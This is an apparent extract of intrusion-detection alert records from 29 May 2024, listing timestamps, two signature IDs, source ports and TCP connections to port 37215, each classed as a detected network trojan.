                Timestamp:05/29/24-15:15:55.895994
                SID:2835222
                Source Port:56276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372057
                SID:2835222
                Source Port:45706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223479
                SID:2829579
                Source Port:37224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826264
                SID:2829579
                Source Port:48988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839702
                SID:2829579
                Source Port:55190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670637
                SID:2835222
                Source Port:55090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.609525
                SID:2835222
                Source Port:34780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818139
                SID:2829579
                Source Port:47462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134655
                SID:2829579
                Source Port:43378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375290
                SID:2829579
                Source Port:51254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175206
                SID:2835222
                Source Port:49430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265743
                SID:2829579
                Source Port:52452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668213
                SID:2835222
                Source Port:45950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855931
                SID:2829579
                Source Port:44696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965900
                SID:2835222
                Source Port:47838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140913
                SID:2835222
                Source Port:43740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289115
                SID:2835222
                Source Port:60478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666507
                SID:2829579
                Source Port:41276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713521
                SID:2835222
                Source Port:59536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868785
                SID:2835222
                Source Port:48630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984485
                SID:2835222
                Source Port:37096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025015
                SID:2835222
                Source Port:51366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364120
                SID:2829579
                Source Port:37290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.101495
                SID:2835222
                Source Port:59596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263985
                SID:2835222
                Source Port:58254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292234
                SID:2829579
                Source Port:42770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161274
                SID:2829579
                Source Port:52928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701313
                SID:2829579
                Source Port:35650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507183
                SID:2829579
                Source Port:52704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359622
                SID:2829579
                Source Port:52402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.973245
                SID:2829579
                Source Port:52088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945462
                SID:2829579
                Source Port:46496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561948
                SID:2829579
                Source Port:33940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207617
                SID:2829579
                Source Port:32962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.717989
                SID:2829579
                Source Port:35198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038498
                SID:2829579
                Source Port:36422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262004
                SID:2835222
                Source Port:41864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.940050
                SID:2829579
                Source Port:52198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437684
                SID:2829579
                Source Port:51432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262671
                SID:2835222
                Source Port:38940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.733042
                SID:2835222
                Source Port:42602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.230450
                SID:2829579
                Source Port:40812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722792
                SID:2835222
                Source Port:40644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983203
                SID:2829579
                Source Port:46370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735040
                SID:2835222
                Source Port:59644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076416
                SID:2835222
                Source Port:33002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765680
                SID:2835222
                Source Port:58164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515261
                SID:2835222
                Source Port:38252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977930
                SID:2829579
                Source Port:45946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962736
                SID:2835222
                Source Port:56028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038607
                SID:2835222
                Source Port:43920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628733
                SID:2829579
                Source Port:48842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467106
                SID:2829579
                Source Port:37686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420890
                SID:2835222
                Source Port:59356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773515
                SID:2829579
                Source Port:47806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464859
                SID:2829579
                Source Port:60078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781360
                SID:2835222
                Source Port:32772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.428440
                SID:2829579
                Source Port:51736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738957
                SID:2835222
                Source Port:50350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557932
                SID:2829579
                Source Port:41282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032687
                SID:2829579
                Source Port:59482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.315854
                SID:2835222
                Source Port:56476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.454180
                SID:2829579
                Source Port:60030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583753
                SID:2829579
                Source Port:48332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264906
                SID:2835222
                Source Port:33998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860134
                SID:2835222
                Source Port:60150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281686
                SID:2835222
                Source Port:53774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282332
                SID:2835222
                Source Port:41978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620631
                SID:2829579
                Source Port:55884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946763
                SID:2829579
                Source Port:57498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805983
                SID:2829579
                Source Port:35562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597493
                SID:2829579
                Source Port:37118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207916
                SID:2835222
                Source Port:41114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237402
                SID:2835222
                Source Port:60162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521679
                SID:2829579
                Source Port:48828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668949
                SID:2829579
                Source Port:56312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711131
                SID:2829579
                Source Port:52432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.516068
                SID:2835222
                Source Port:34888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141477
                SID:2835222
                Source Port:53818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909820
                SID:2835222
                Source Port:43042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563282
                SID:2835222
                Source Port:49530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730758
                SID:2829579
                Source Port:51336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910321
                SID:2835222
                Source Port:54650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320416
                SID:2829579
                Source Port:59554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182197
                SID:2829579
                Source Port:55798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863084
                SID:2829579
                Source Port:44932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.031421
                SID:2835222
                Source Port:58446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141581
                SID:2835222
                Source Port:43786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465870
                SID:2829579
                Source Port:55668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993566
                SID:2829579
                Source Port:41774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521832
                SID:2829579
                Source Port:45106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520126
                SID:2835222
                Source Port:53466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877872
                SID:2835222
                Source Port:47510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074591
                SID:2829579
                Source Port:36650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896072
                SID:2835222
                Source Port:52280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814629
                SID:2829579
                Source Port:45840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520545
                SID:2829579
                Source Port:40774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613956
                SID:2835222
                Source Port:42952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.070157
                SID:2835222
                Source Port:45568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653303
                SID:2829579
                Source Port:59462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262172
                SID:2835222
                Source Port:35582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833584
                SID:2829579
                Source Port:34868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.543863
                SID:2835222
                Source Port:53738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421800
                SID:2829579
                Source Port:51446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209414
                SID:2835222
                Source Port:35612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.946979
                SID:2835222
                Source Port:52422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228630
                SID:2835222
                Source Port:49202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039688
                SID:2829579
                Source Port:48154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.588712
                SID:2835222
                Source Port:56492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.806042
                SID:2829579
                Source Port:50772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422561
                SID:2835222
                Source Port:46140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.564750
                SID:2829579
                Source Port:56664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840404
                SID:2835222
                Source Port:43342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023246
                SID:2829579
                Source Port:37588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858626
                SID:2835222
                Source Port:43516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.908174
                SID:2829579
                Source Port:60724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074765
                SID:2835222
                Source Port:60258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809998
                SID:2829579
                Source Port:59712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732380
                SID:2829579
                Source Port:37788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360434
                SID:2829579
                Source Port:58238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555933
                SID:2835222
                Source Port:59572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.799554
                SID:2829579
                Source Port:41382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776844
                SID:2835222
                Source Port:36242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787008
                SID:2829579
                Source Port:56800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.864497
                SID:2829579
                Source Port:59954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335706
                SID:2835222
                Source Port:41578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909344
                SID:2829579
                Source Port:43388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513697
                SID:2835222
                Source Port:48518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502619
                SID:2835222
                Source Port:47332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722111
                SID:2829579
                Source Port:43702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037404
                SID:2835222
                Source Port:54552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136982
                SID:2835222
                Source Port:43058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289197
                SID:2829579
                Source Port:46270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844129
                SID:2835222
                Source Port:36928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281484
                SID:2829579
                Source Port:49678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929873
                SID:2835222
                Source Port:44930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324691
                SID:2829579
                Source Port:54602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.975241
                SID:2829579
                Source Port:41878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434772
                SID:2835222
                Source Port:60606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841692
                SID:2829579
                Source Port:54946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781686
                SID:2829579
                Source Port:57292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977554
                SID:2829579
                Source Port:53292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165228
                SID:2829579
                Source Port:51112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499802
                SID:2829579
                Source Port:54090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841776
                SID:2835222
                Source Port:53820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265798
                SID:2835222
                Source Port:41182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848718
                SID:2829579
                Source Port:52340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.895988
                SID:2829579
                Source Port:38268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111809
                SID:2829579
                Source Port:55918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359555
                SID:2829579
                Source Port:38068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927840
                SID:2829579
                Source Port:60462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429200
                SID:2835222
                Source Port:55284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.028716
                SID:2835222
                Source Port:34790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583471
                SID:2835222
                Source Port:59208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781133
                SID:2835222
                Source Port:34594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584471
                SID:2835222
                Source Port:48716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023466
                SID:2829579
                Source Port:38644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929767
                SID:2829579
                Source Port:40968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779439
                SID:2829579
                Source Port:35162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436161
                SID:2829579
                Source Port:50928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958256
                SID:2835222
                Source Port:44050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508689
                SID:2829579
                Source Port:35652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013471
                SID:2829579
                Source Port:58586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597435
                SID:2835222
                Source Port:54620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173904
                SID:2835222
                Source Port:39296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264165
                SID:2835222
                Source Port:45964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903028
                SID:2829579
                Source Port:59430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593739
                SID:2835222
                Source Port:52326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765779
                SID:2835222
                Source Port:58224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804251
                SID:2829579
                Source Port:51786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813049
                SID:2835222
                Source Port:46844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231177
                SID:2835222
                Source Port:42994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983307
                SID:2829579
                Source Port:38496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023142
                SID:2835222
                Source Port:60276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899570
                SID:2835222
                Source Port:51168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264490
                SID:2835222
                Source Port:36188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975155
                SID:2835222
                Source Port:33098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.369088
                SID:2835222
                Source Port:48202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688965
                SID:2829579
                Source Port:39516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614272
                SID:2829579
                Source Port:54278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422463
                SID:2835222
                Source Port:52326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842285
                SID:2835222
                Source Port:39946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685830
                SID:2829579
                Source Port:55008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659514
                SID:2835222
                Source Port:54772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521787
                SID:2835222
                Source Port:53056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362730
                SID:2835222
                Source Port:41016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232083
                SID:2835222
                Source Port:56002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417814
                SID:2829579
                Source Port:51912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.230928
                SID:2835222
                Source Port:53650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960414
                SID:2829579
                Source Port:59684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.927581
                SID:2835222
                Source Port:51508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276219
                SID:2835222
                Source Port:42488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518314
                SID:2829579
                Source Port:48014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666163
                SID:2835222
                Source Port:35888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498492
                SID:2835222
                Source Port:57074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.976344
                SID:2829579
                Source Port:51808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509741
                SID:2829579
                Source Port:49336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.011001
